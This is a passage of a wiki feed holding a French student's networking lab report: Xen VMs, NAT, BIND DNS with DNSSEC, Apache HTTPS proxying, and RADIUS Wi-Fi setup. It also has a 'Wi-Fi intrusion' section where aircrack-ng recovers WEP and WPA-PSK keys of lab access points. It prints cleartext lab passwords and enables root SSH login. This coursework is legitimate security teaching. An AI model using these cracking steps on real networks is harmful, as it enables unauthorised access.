interface Dot11Radio0&lt;br /&gt;
ssid VM_SERVICES_6&lt;br /&gt;
exit&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== '''FreeRADIUS''' =====&lt;br /&gt;
FreeRADIUS a été installé sur la machine de service. Malgré plusieurs tentatives, je n'ai pas réussi à le faire fonctionner. Dans '''/etc/freeradius/3.0/clients.conf''', j'ai ajouté :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
client wifi-ap-306 {                                                                &lt;br /&gt;
                ipaddr = 172.27.0.3                                                 &lt;br /&gt;
                secret = radius_thomas                                              &lt;br /&gt;
                shortname = wifi-e306                                               &lt;br /&gt;
                nas_type = cisco                                                    &lt;br /&gt;
}                                                                                   &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Dans '''/etc/freeradius/3.0/users''' :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;quot;tdelobel&amp;quot; Cleartext-Password := &amp;quot;Seconddegree2&amp;quot;                                    &lt;br /&gt;
        Tunnel-Type = VLAN,                                                         &lt;br /&gt;
        Tunnel-Medium-Type = IEEE-802,                                              &lt;br /&gt;
        Tunnel-Private-Group-Id = 16                                                &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, dans '''/etc/freeradius/3.0/mods-available/eap''', j'ai modifié la ligne suivante : &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
default_eap_type = peap   &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;/div&gt;</summary>
		<author><name>Tdelobel</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E6&amp;diff=12570</id>
		<title>Atelier SysRes SE4 2025/2026 E6</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E6&amp;diff=12570"/>
		<updated>2026-02-27T16:48:55Z</updated>

		<summary type="html">&lt;p&gt;Tdelobel : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Compte rendu : ===&lt;br /&gt;
&lt;br /&gt;
==== Création du bridge dans capbreton ====&lt;br /&gt;
Avant de créer nos VM, on ajoute notre bridge à capbreton  dans SE42026_cpayet_tdelobel&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
auto pont_pacman&lt;br /&gt;
iface pont_pacman inet manual&lt;br /&gt;
    bridge_ports none&lt;br /&gt;
    up ip link set $IFACE up&lt;br /&gt;
    down ip link set $IFACE down&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On utilise ifup pour le démarrer.&lt;br /&gt;
&lt;br /&gt;
==== Création des VMs ====&lt;br /&gt;
Pour créer la VM de service et mandataire, on utilise les commandes suivantes&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
xen-create-image --hostname=SE4.Manjaro         --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force&lt;br /&gt;
xen-create-image --hostname=SE4.LinusTorvalds   --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Manjaro sera la machine de service et LinusTorvalds la mandataire&lt;br /&gt;
&lt;br /&gt;
Puis &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
xen create /etc/xen/SE4.Manjaro.cfg&lt;br /&gt;
xen create /etc/xen/SE4.LinusTorvalds.cfg&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nos machines sont maintenant listées.&lt;br /&gt;
&lt;br /&gt;
==== Partitionnement ====&lt;br /&gt;
&lt;br /&gt;
===== Sur capbreton =====&lt;br /&gt;
Tout d'abord on se donne 10g d'espace pour notre machine virtuelle :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
lvcreate -n SE4.Manjaro.var -L 10G virtual&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On ajoute dans /etc/xen/SE4.Manjaro.cfg : &amp;lt;syntaxhighlight lang=&amp;quot;cfg&amp;quot;&amp;gt;&lt;br /&gt;
disk = [&lt;br /&gt;
            [...],&lt;br /&gt;
            'phy:/dev/virtual/SE4.Manjaro.home,xvda3,w',&lt;br /&gt;
            'phy:/dev/virtual/SE4.Manjaro.var,xvdb1,w'&lt;br /&gt;
        ]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Sur la VM =====&lt;br /&gt;
Afin que la configuration soit enregistré, on modifie le /etc/fstab en ajoutant les lignes suivantes :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
/dev/xvda3 /var ext4 defaults 0 2&lt;br /&gt;
/dev/xvdb1 /home ext4 defaults 0 2&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Puis dans le terminal, on utilise les commandes suivantes (à ne surtout pas utiliser sur capbreton !!)&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
mkfs -t ext4 /dev/xvda3&lt;br /&gt;
mkfs -t ext4 /dev/xvdb1&lt;br /&gt;
mount /dev/xvda3 /mnt&lt;br /&gt;
mv /var/* /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
mount -a&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On peut maintenant relancer la machine pour verifier si la config reste.&lt;br /&gt;
&lt;br /&gt;
Enfin on répète le même schéma pour la machine mandataire.&lt;br /&gt;
&lt;br /&gt;
==== Adresses ipv4 et ipv6 ====&lt;br /&gt;
Tout d'abord dans notre machine des service, on donne une adresse ipv4 local et ipv6, on modifie donc le fichier /etc/network/interfaces :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.10.2/24&lt;br /&gt;
    gateway 192.168.10.1&lt;br /&gt;
&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet6 auto&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On va aussi ajouter le bridge depuis capbreton dans /etc/xen/SE4.Manjaro.cfg:&amp;lt;syntaxhighlight lang=&amp;quot;cfg&amp;quot;&amp;gt;&lt;br /&gt;
vif = [[...], 'mac=00:16:3E:36:79:D9,bridge=SE4']&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Et dans la machine mandataire on va donner une adresse ipv4 du reseau publique et privé:&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
auto lo                                                                             &lt;br /&gt;
iface lo inet loopback                                                              &lt;br /&gt;
&lt;br /&gt;
auto eth0                                                                           &lt;br /&gt;
iface eth0 inet static                                                              &lt;br /&gt;
        address 192.168.10.1/24                                                     &lt;br /&gt;
&lt;br /&gt;
auto eth1                                                                           &lt;br /&gt;
iface eth1 inet static                                                              &lt;br /&gt;
        address 193.48.57.166/24                                                    &lt;br /&gt;
        gateway 193.48.57.162                                                       &lt;br /&gt;
iface eth1 inet6 auto                                                               &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On ajoute au fichier resolv.conf le dns de google et on install les outils qui nous servirons pour la suite (iptables-persistant, ssh, bind9, apache 2...)&lt;br /&gt;
&lt;br /&gt;
==== Masquerade et ssh ====&lt;br /&gt;
Nous pouvons maintenant mettre en places les iptables pour s'occuper à la fois du ssh (redirection de port) et de la Masquerade avec les commandes suivantes :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22&lt;br /&gt;
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Après avoir sauvegarder avec iptables-save, on décommente dans  &amp;lt;code&amp;gt;/etc/sysctl.conf&amp;lt;/code&amp;gt;:&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin pour permettre de se ssh en root sur toutes les VM, on ajoute dans  &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Maintenant, il n'est plus obligatoire de passer par capbreton pour se connecter aux VM, nous utiliserons les commandes suivantes :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
ssh root@193.48.57.166 #pour la machine mandataire&lt;br /&gt;
ssh root@193.48.57.166 -p 2202 # pour la machine de service&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== DNS ====&lt;br /&gt;
&lt;br /&gt;
===== Machine de service =====&lt;br /&gt;
On débute par modifier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; , on y ajoute notre zone principale et celle de notre camarade :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
zone &amp;quot;archlinux.lol&amp;quot; {                                                              &lt;br /&gt;
        type master;                                                                &lt;br /&gt;
        file &amp;quot;/etc/bind/zones/db.archlinux.lol&amp;quot;;                                    &lt;br /&gt;
        allow-transfer{secondaries;};                                               &lt;br /&gt;
        also-notify{hiddensecondaries;};                                            &lt;br /&gt;
        notify yes;                                                                 &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
acl &amp;quot;secondaries&amp;quot; {                                                                 &lt;br /&gt;
        192.168.10.3;                                                               &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe8b:45ed;                                      &lt;br /&gt;
        192.168.10.1;                                                               &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:feaa:bff0;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
masters &amp;quot;hiddensecondaries&amp;quot; {                                                       &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:feaa:bff0;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
zone &amp;quot;archlinuxbtw.lol&amp;quot; {                                                           &lt;br /&gt;
        type secondary;                                                             &lt;br /&gt;
        file &amp;quot;/etc/bind/backup/db.archlinuxbtw.lol&amp;quot;;                                &lt;br /&gt;
        primaries{2001:660:4401:60a0:216:3eff:fe8b:45ed;};                          &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                           &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Puis on crée notre zone db.archlinux.lol :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
$TTL 400                                                                            &lt;br /&gt;
                                                                                    &lt;br /&gt;
@ IN SOA ns.archlinux.lol. admin.archlinux.lol. (                                   &lt;br /&gt;
           3611     ; Numéro de version                                             &lt;br /&gt;
          21600     ; Rafraîchissement (6h)                                         &lt;br /&gt;
           3600     ; Re-tentative (1h)                                             &lt;br /&gt;
        2592000     ; Expiration (30j)                                              &lt;br /&gt;
          86400     ; Cache négatif (24h)                                           &lt;br /&gt;
);                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
@ IN NS ns.archlinux.lol.                                                           &lt;br /&gt;
@ IN NS ns.archlinuxbtw.lol.                                                        &lt;br /&gt;
                                                                                    &lt;br /&gt;
ns IN A 193.48.57.166                                                               &lt;br /&gt;
@ IN A 193.48.57.166                                                                &lt;br /&gt;
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe36:79d9                                    &lt;br /&gt;
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe36:79d9                                     &lt;br /&gt;
                                                                                    &lt;br /&gt;
www IN CNAME archlinux.lol.                                                         &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Machine mandataire =====&lt;br /&gt;
Dans la machine mandataire, on doit passer les zones de nos machine de service en zone secondaire, ainsi, on aura un fichier tel que celui-ci :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
zone &amp;quot;archlinuxbtw.lol&amp;quot; {                                                           &lt;br /&gt;
        type secondary;                                                             &lt;br /&gt;
        file &amp;quot;/etc/bind/backup/db.archlinuxbtw.lol&amp;quot;;                                &lt;br /&gt;
        primaries{2001:660:4401:60a0:216:3eff:fe8b:45ed;};                          &lt;br /&gt;
};                                                                                  &lt;br /&gt;
zone &amp;quot;archlinux.lol&amp;quot; {                                                              &lt;br /&gt;
        type secondary;                                                             &lt;br /&gt;
        file &amp;quot;/etc/bind/backup/db.archlinux.lol&amp;quot;;                                   &lt;br /&gt;
        primaries{2001:660:4401:60a0:216:3eff:fe36:79d9;};                          &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
acl &amp;quot;secondaries&amp;quot; {                                                                 &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe8b:45ed;                                      &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe36:79d9;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, il faut rajouter nos zones au Glue records de Gandi pour que notre DNS soit reconnu partout dans le monde.&lt;br /&gt;
&lt;br /&gt;
On peut d'ailleurs le vérifier sur le site https://dnschecker.org/&lt;br /&gt;
[[Fichier:Dns-check-thomas.png|centré|vignette]]&lt;br /&gt;
&lt;br /&gt;
==== DNSSEC ====&lt;br /&gt;
Afin de sécuriser notre DNS, on modifie notre &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
zone &amp;quot;archlinux.lol&amp;quot; {                                                              &lt;br /&gt;
        type master;                                                                &lt;br /&gt;
        file &amp;quot;/etc/bind/zones/db.archlinux.lol&amp;quot;;                                    &lt;br /&gt;
        allow-transfer{secondaries;};                                               &lt;br /&gt;
        also-notify{hiddensecondaries;};                                            &lt;br /&gt;
        notify yes;                                                                 &lt;br /&gt;
        key-directory &amp;quot;/etc/bind/keys&amp;quot;;                                             &lt;br /&gt;
        dnssec-policy &amp;quot;dnspol&amp;quot;;                                                     &lt;br /&gt;
        inline-signing yes;&lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
acl &amp;quot;secondaries&amp;quot; {                                                                 &lt;br /&gt;
        192.168.10.3;                                                               &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe8b:45ed;                                      &lt;br /&gt;
        192.168.10.1;                                                               &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:feaa:bff0;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
masters &amp;quot;hiddensecondaries&amp;quot; {                                                       &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:feaa:bff0;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
zone &amp;quot;archlinuxbtw.lol&amp;quot; {                                                           &lt;br /&gt;
        type secondary;                                                             &lt;br /&gt;
        file &amp;quot;/etc/bind/backup/db.archlinuxbtw.lol&amp;quot;;                                &lt;br /&gt;
        primaries{2001:660:4401:60a0:216:3eff:fe8b:45ed;};                          &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {                                                            &lt;br /&gt;
   keys {                                                                           &lt;br /&gt;
       ksk key-directory lifetime unlimited algorithm 13;                           &lt;br /&gt;
       zsk key-directory lifetime unlimited algorithm 13;                           &lt;br /&gt;
   };                                                                               &lt;br /&gt;
   nsec3param;                                                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;et on ajoute un répertoire pour les clés (auquel on donnera les permissions d'écriture) :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
mkdir /etc/bind/keys &lt;br /&gt;
chown bind:bind /etc/bind/keys &lt;br /&gt;
chmod 750 /etc/bind/keys&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Après avoir redémaré bind9 et named, on peut voir que les clés sont effectivement bien généré. Pour vérifier si notre DNS est sécurisé, il faudra passer par https://dnsviz.net/&lt;br /&gt;
[[Fichier:DNSSEC-thomas.png|centré|vignette]]&lt;br /&gt;
&lt;br /&gt;
==== serveur Apache ====&lt;br /&gt;
&lt;br /&gt;
===== Sur la machine de service =====&lt;br /&gt;
&lt;br /&gt;
En premier lieu, on va générer notre clé avec :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
openssl req -nodes -newkey rsa:2048 -sha256 -keyout archlinux.lol.key -out archlinux.csr&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Une fois la clé généré on récupère la certification la certification sur Gandi&lt;br /&gt;
&lt;br /&gt;
On va ensuite créer notre site dans &amp;lt;code&amp;gt;etc/apache2/sites-available/archlinux.lol.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
La page html sera enregistré dans &amp;lt;code&amp;gt;etc/www/archlinux.lol&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On effectue aussi une redirection du port http vers https.&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;                                                                  &lt;br /&gt;
    ServerName archlinux.lol                                                        &lt;br /&gt;
    ServerAlias www.archlinux.lol                                                   &lt;br /&gt;
    Redirect permanent / https://archlinux.lol/                                     &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;                                                                      &lt;br /&gt;
                                                                                    &lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;                                                                 &lt;br /&gt;
    ServerName archlinux.lol                                                        &lt;br /&gt;
    ServerAlias www.archlinux.lol                                                   &lt;br /&gt;
    DocumentRoot /var/www/archlinux.lol                                             &lt;br /&gt;
                                                                                    &lt;br /&gt;
    &amp;lt;Directory /var/www/archlinux.lol&amp;gt;                                              &lt;br /&gt;
        Options Indexes FollowSymLinks                                              &lt;br /&gt;
        AllowOverride All                                                           &lt;br /&gt;
        Require all granted                                                         &lt;br /&gt;
    &amp;lt;/Directory&amp;gt;                                                                    &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/error.log                                            &lt;br /&gt;
    CustomLog /var/log/apache2/secure_access.log combined                           &lt;br /&gt;
                                                                                    &lt;br /&gt;
    SSLEngine on                                                                    &lt;br /&gt;
    SSLCertificateFile /etc/ssl/certs/archlinux.lol.crt                             &lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/private/archlinux.lol.key                        &lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/certs/GandiCert.pem                            &lt;br /&gt;
                                                                                    &lt;br /&gt;
    SSLVerifyClient None                                                            &lt;br /&gt;
                                                                                    &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;                                                                      &lt;br /&gt;
                                                                                    &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Notre site est maintenant accessible en ipv6. Il faut maintenant configurer la machine mandataire pour qu'il le soit aussi en ipv4.  &lt;br /&gt;
&lt;br /&gt;
===== Sur la machine de mandataire =====&lt;br /&gt;
Là aussi, après avoir récupéré les clé et certificat de la machine mandataire, on va crée un fichier &amp;lt;code&amp;gt;etc/apache2/sites-available/archlinux.lol-proxy.conf&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;                                                                  &lt;br /&gt;
    ServerName archlinux.lol                                                        &lt;br /&gt;
    ServerAlias www.archlinux.lol                                                   &lt;br /&gt;
    Redirect permanent / https://archlinux.lol/                                     &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;                                                                      &lt;br /&gt;
                                                                                    &lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;                                                                 &lt;br /&gt;
    ServerName archlinux.lol                                                        &lt;br /&gt;
    ServerAlias www.archlinux.lol                                                   &lt;br /&gt;
                                                                                    &lt;br /&gt;
    SSLProxyEngine on                                                               &lt;br /&gt;
    ProxyPass / https://archlinux.lol/                                              &lt;br /&gt;
    ProxyPassReverse / https://archlinux.lol/                                       &lt;br /&gt;
    ProxyPreserveHost on                                                            &lt;br /&gt;
                                                                                    &lt;br /&gt;
    SSLEngine on                                                                    &lt;br /&gt;
    SSLCertificateFile /etc/ssl/certs/archlinux.lol.crt                             &lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/private/archlinux.lol.key                        &lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/certs/GandiCert.pem                            &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/error.log                                            &lt;br /&gt;
    CustomLog ${APACHE_LOG_DIR}/access.log combined                                 &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;                                                                      &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Notre site est maintenant disponible partout et en https.&lt;br /&gt;
[[Fichier:Site-thomas.png|centré|vignette]]&lt;br /&gt;
&lt;br /&gt;
==== Effraction WIFI ====&lt;br /&gt;
&lt;br /&gt;
===== Cassage WEP =====&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On trouve cracotte06 avec son adresse et son chanel&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1 --write dump --bssid 04:DA:D2:9C:50:55 -c4&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Le fichier dump étant crée, on récupère la clé avec la commande suivante :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo  aircrack-ng -b 04:DA:D2:9C:50:55 dump-22.cap&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
                                                                                     Aircrack-ng 1.7 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                                                                       [00:00:00] Tested 525 keys (got 63977 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    1/  2   20(74752) 5B(73216) F0(73216) 1E(72704) 77(72192) 12(71936) 78(71936) ED(71936) 21(71680) EF(71680) 58(71424) AE(71424) 4D(71168) 5A(70656) 02(70400) &lt;br /&gt;
    1    5/  1   48(74496) DA(71936) 47(71680) 55(71680) B9(71168) BD(70656) DE(70656) 01(70400) 77(70400) A2(70400) 6C(70144) 74(70144) 7C(70144) 8E(70144) 92(70144) &lt;br /&gt;
    2   73/  2   CE(66560) CC(66304) E2(66304) DD(66048) ED(66048) 69(65536) 97(65536) A7(65536) AC(65536) B8(65536) 44(65280) 72(65280) D7(65280) EA(65280) F4(65280) &lt;br /&gt;
    3    7/ 11   5C(73984) 14(72960) 6E(72960) E8(72448) 00(71424) EB(71424) 04(71168) 23(70912) 35(70912) AB(70912) 58(70656) 1B(70400) CA(70400) D4(70400) FE(70400) &lt;br /&gt;
    4    0/  3   F6(92416) 2D(73472) 30(72704) 6A(71680) 9D(71680) BD(71680) C9(71680) 2B(71168) 3D(70400) 52(70400) C8(70400) D8(70400) 49(70144) F8(70144) FE(69632) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ FF:FF:FF:FF:FA:BC:07:CB:AE:EE:EE:EE:EE ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Cassage WPA-PKS =====&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1 --write dump --bssid 44:AD:D9:5F:87:05 -c13&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On va maintenant essayer de récupéré la clé avec un dictionaire dico.txt&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo  aircrack-ng -a2 -w dico.txt -b 44:AD:D9:5F:87:05 dump-23.cap&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
                               Aircrack-ng 1.7 &lt;br /&gt;
&lt;br /&gt;
      [00:28:29] 66973408/100000000 keys tested (39839.22 k/s) &lt;br /&gt;
&lt;br /&gt;
      Time left: 13 minutes, 48 seconds                         66.97%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66684666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 63 5F 7F 36 2C 70 49 04 6A 29 11 FE C8 C1 0C FD &lt;br /&gt;
                       4D 16 18 BE C9 48 70 31 C5 7B 13 BD E1 02 8A 15 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation wifi ====&lt;br /&gt;
&lt;br /&gt;
===== Config routeur =====&lt;br /&gt;
On va configurer notre interface, son vrrp et le dhcp :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
ip dhcp pool PoolThomas                                                             &lt;br /&gt;
 network 10.60.6.0 255.255.255.0&lt;br /&gt;
 dns-server 193.48.57.166                                                           &lt;br /&gt;
 default-router 10.60.6.254                                                         &lt;br /&gt;
!                                                                                   &lt;br /&gt;
...&lt;br /&gt;
vlan 16                                                                             &lt;br /&gt;
 name E6-Thomas                                                                     &lt;br /&gt;
!&lt;br /&gt;
...&lt;br /&gt;
interface Vlan16                                                                    &lt;br /&gt;
 ip address 10.60.6.2 255.255.255.0                                                 &lt;br /&gt;
 ipv6 address 2001:660:4401:60A6::2/64                                              &lt;br /&gt;
 vrrp 16 address-family ipv4                                                        &lt;br /&gt;
  priority 110                                                                      &lt;br /&gt;
  address 10.60.6.1 primary                                                         &lt;br /&gt;
  exit-vrrp                                                                         &lt;br /&gt;
!&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Configuration bornes wifi : =====&lt;br /&gt;
Sur les bornes wifi, On applique la configuration donné par le sujet :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
conf t&lt;br /&gt;
&lt;br /&gt;
aaa new-model&lt;br /&gt;
aaa authentication login eap_student5 group radius_student5&lt;br /&gt;
radius-server host 192.168.10.2 auth-port 1812 acct-port 1813 key secret_student6        &lt;br /&gt;
aaa group server radius radius_student5                      &lt;br /&gt;
server 192.168.10.2 auth-port 1812 acct-port 1813        &lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
dot11 ssid VM_SERVICES_6       &lt;br /&gt;
vlan 16         &lt;br /&gt;
authentication open eap eap_student6 &lt;br /&gt;
authentication network-eap eap_student6&lt;br /&gt;
authentication key-management wpa&lt;br /&gt;
mbssid guest-mode&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption vlan 16 mode ciphers aes-ccm                  &lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.16&lt;br /&gt;
encapsulation dot1Q 16&lt;br /&gt;
bridge-group 16&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.16&lt;br /&gt;
encapsulation dot1Q 16&lt;br /&gt;
bridge-group 16&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
ssid VM_SERVICES_6&lt;br /&gt;
exit&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Freeradius =====&lt;br /&gt;
